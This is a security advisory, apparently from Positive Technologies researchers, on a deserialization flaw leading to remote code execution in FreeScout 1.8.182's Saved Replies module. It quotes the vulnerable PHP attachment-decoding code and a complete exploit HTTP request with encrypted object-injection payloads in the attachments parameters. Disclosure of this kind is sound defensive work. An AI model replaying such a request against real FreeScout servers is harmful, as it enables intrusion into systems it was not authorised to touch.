$this->processAttachments($saved_reply, $request);
public function processAttachments($saved_reply, $request)
{
$attachments = [];
if (!empty($request->attachments_all)) {
$attachments_all = $this->decodeAttachmentsIds($request->attachments_all);
if (!empty($request->attachments)) {
$attachments = $this->decodeAttachmentsIds($request->attachments);
}
$attachments_to_remove = array_diff($attachments_all, $attachments);
Attachment::deleteByIds($attachments_to_remove);
$saved_reply->attachments = $attachments;
}
public function decodeAttachmentsIds($attachments_list)
{
foreach ($attachments_list as $i => $attachment_id) {
$attachment_id_decrypted = \Helper::decrypt($attachment_id);
if ($attachment_id_decrypted == $attachment_id) {
unset($attachments_list[$i]);
} else {
$attachments_list[$i] = $attachment_id_decrypted;
}
}
return $attachments_list;
}
POST /mailbox/saved-replies/ajax HTTP/1.1
Host: freescout.web-hacks.ru
Cookie: laravel_session=eyJpdiI6Ik1xbWJ1MVloNXFMb0IzckpsSjFtTlE9PSIsInZhbHVlIjoiMjRFZXhjXC9kMmJGSkdJR0ZrVnNoWk90OVVpWkVkXC9RanpOXC9cL2xIZFVFUnp3aGpTQ1JcL3RYZGpmcHM0NStNZU41ZmhuT1hQQ2txNXVDSDJTcmNsXC96NFwvNElZeW8rMkpObEtXakNqclwvVWs0OG1Jck82WXFNMlA3dWZtWjdUWkJ5biIsIm1hYyI6ImQ0NTU3ZWU4N2QxYmM1NThlMDcxNTVjYWRlOTdjYjI1NDE3NTIyYmI5OTdjMzY3N2FlMWIxNDQyNDQzNmNhZTcifQ%3D%3D; enduserportal_auth=eyJpdiI6InJVZGRXSzZlWkIwZGlcL2FlZ3lraDVBPT0iLCJ2YWx1ZSI6IkFPc1BjVUZVZHBXUVRzZEZaeTVoWGc3Z3V4SklvYVhjSTVQbkJHNmgxVHk5aDMrd1JyRTM4U3pmdERtdk9YblBDd0Q1dnQwWWd6UHFDeURjek12d1cxbVVkOG9DQlMrKzhmcnhZYWxHZm1VeDJHeE9iRENRcDlFcUxcL0pFdTJDMkhMMHhtUnJYWkczV0FLT3E5MGxyc2VZOVR3WUpINHIyZld0SlI2bEZVdXljZmowZ1wvNDJBQ24wbFwvcVIxMnluRVhyVVNlUDcwaXBGcU5QU0xGU0s1dzQ2T0FPTmJlTTFacDZJc0ZmaHlXU3VkRHl4alBhM3BCMVZxVTBcL0QydkV4d0xrdEMxSDlOZjhRZks4VWMyc3VSZ05lZ2xxME1uNjJBMFRRNTU5YUFEaFlvU1I0dDhLVFhiSUNNWEFcLzFYTVFwUnVUakVGYWRvNVg1NzhPUFZTMGVaVDMwY3pibDFTOHpQYXBrM0pTS2VVPSIsIm1hYyI6IjQzZmQ3YzYxMTc1YzQwZDYzNGFhZTM2YWUxMmM1Nzg2ZjA1ZmI1YzcxZjc5NGYxOTA0NGQ0NzJlMmY2ZmU3NWMifQ%3D%3D; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IkNQRTJZZlhZQ0RPU2tYbnhnMHpqMkE9PSIsInZhbHVlIjoib3RRVXlScmZlWE5jSjNIYTFXcGQ5RWV2N1JSTGkxMlwvT3JXT2JtR1dMWDRZcUJNdEh0SnUzNEdHcU5CREcxV3hiZnhxRm0zRlMxUmxwKzdsXC84QitVODdFYTZpTG1ERFZPQWs4c3lOZVJaeGE2MWx6K21WcUtxdHR5MlB0Q3JINkk1NWFkbHNCMXN6NFg3czRzVVRkZzNcL0w0SVwvTjBUXC9yZkJPUjJEVExYS005UHkrTFBVRW5KdENBRTFhU25MRXh4dHdiZFlPXC9vREJiWURGeW1lQms3d01CVDVTVFQySCtKQ0dubXROYlE5MD0iLCJtYWMiOiI4YzMwMWQ4NTc4YWE4YmEwZWI1MmMyMjUxMWRjOTc4NjNhNzE3MjkzM2M4NGIwYWMwNmI3MGY4YmE5OTc1NTQ3In0%3D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Csrf-Token: z8TXPaF96jFJipshqmciy2AZnlPw9jQYkhxXTZoI
X-Requested-With: XMLHttpRequest
Content-Length: 1391
Origin: https://freescout.web-hacks.ru
Referer: https://freescout.web-hacks.ru/mailbox/saved-replies/1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive
action=create&mailbox_id=1&name=1231123&text=&attachments_all%5B%5D=eyJpdiI6ICJyYkdxbk9RQ0MrbFZkZTdFVFdRbnF3PT0iLCAidmFsdWUiOiAidHlFbjlZRzdUL3pMUjJVMGRKelQydlpCZDNkV0FpRS8zZ0ViRFRycXdXQUdJZ3EyTjFuYytEc0ZPMFU2TXBPdFRlMGNwYkIwVUhOSHJqTmg1YTU5bmYzV1pwVnhKc1BiNFN4L0ZYZDJualNKbHBvYTN3Mm02RHJoVzN2R2ZjUHA5NlFXQXNtYzFyd0YreWN3TFFLVU1mamVORnRNNytmY0hTQWZCOEpkL3R2bml0MU1TaW93OERuSkxCRFM0RVlVcTEyWitNTE9sY2hPK01pL3Jnb3U5d3BUc3RLRVVLNUx5bjdONitGKzFkSzA0UFFyT2s3cGZBaGhOL2NLVy84MXdpUzZWS2twb0k0RVp3d2pxcnBPUEdGU0VuZTNFWHNlUzFzejFyL2xyWHR4UHpCUjYzNTc1OGxtd1VCQlVZQTVOdnEzcjBrY3Ftb0h6R1JDTG9pTnZ3PT0iLCAibWFjIjogIjZiYjY2MWU1N2Y2MTg3MDFjYmNhYjc3ZmFkNTRlMTU4ZTc5OTc1YjZlMmYxMGRkNWRlMjVmOGYyNWY0MWFlMDYiLCAidGFnIjogIiJ9&attachments%5B%5D=eyJpdiI6ICJyYkdxbk9RQ0MrbFZkZTdFVFdRbnF3PT0iLCAidmFsdWUiOiAidHlFbjlZRzdUL3pMUjJVMGRKelQydlpCZDNkV0FpRS8zZ0ViRFRycXdXQUdJZ3EyTjFuYytEc0ZPMFU2TXBPdFRlMGNwYkIwVUhOSHJqTmg1YTU5bmYzV1pwVnhKc1BiNFN4L0ZYZDJualNKbHBvYTN3Mm02RHJoVzN2R2ZjUHA5NlFXQXNtYzFyd0YreWN3TFFLVU1mamVORnRNNytmY0hTQWZCOEpkL3R2bml0MU1TaW93OERuSkxCRFM0RVlVcTEyWitNTE9sY2hPK01pL3Jnb3U5d3BUc3RLRVVLNUx5bjdONitGKzFkSzA0UFFyT2s3cGZBaGhOL2NLVy84MXdpUzZWS2twb0k0RVp3d2pxcnBPUEdGU0VuZTNFWHNlUzFzejFyL2xyWHR4UHpCUjYzNTc1OGxtd1VCQlVZQTVOdnEzcjBrY3Ftb0h6R1JDTG9pTnZ3PT0iLCAibWFjIjogIjZiYjY2MWU1N2Y2MTg3MDFjYmNhYjc3ZmFkNTRlMTU4ZTc5OTc1YjZlMmYxMGRkNWRlMjVmOGYyNWY0MWFlMDYiLCAidGFnIjogIiJ9&parent_saved_reply_id=&global=0
Deserialization of untrusted data leads to Remote code execution [3]
Product: FreeScout
Version: 1.8.182
CWE-ID:
• CWE-502: Deserialization of Untrusted Data
• CAPEC-586: Object Injection
CVSS vector v.4.0: 7.0 (AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N)
Description: The application performs deserialization of data that can be tampered with. An attacker can create objects of arbitrary classes, as well as fully control their properties, thereby allowing them to manipulate the web application's logic.
Vulnerable scenarios: /mailbox/saved-replies/ajax
Vulnerable parameters:
• POST attachments_all[]
• POST attachments[]
Exploitation conditions: Admin rights, APP_KEY knowledge, Saved Replies Module installed
Researchers: Daniil Satyaev, Roman Cheremnykh, Artem Danilov (Positive Technologies)
Research
Vulnerable code:
Listing Code snippet exploiting the vulnerable function Helper::decrypt (Modules\SavedReplies\Http\Controllers\SavedRepliesController.php)
Exploitation scenario:
Listing HTTP-request to exploit «Deserialization of untrusted data»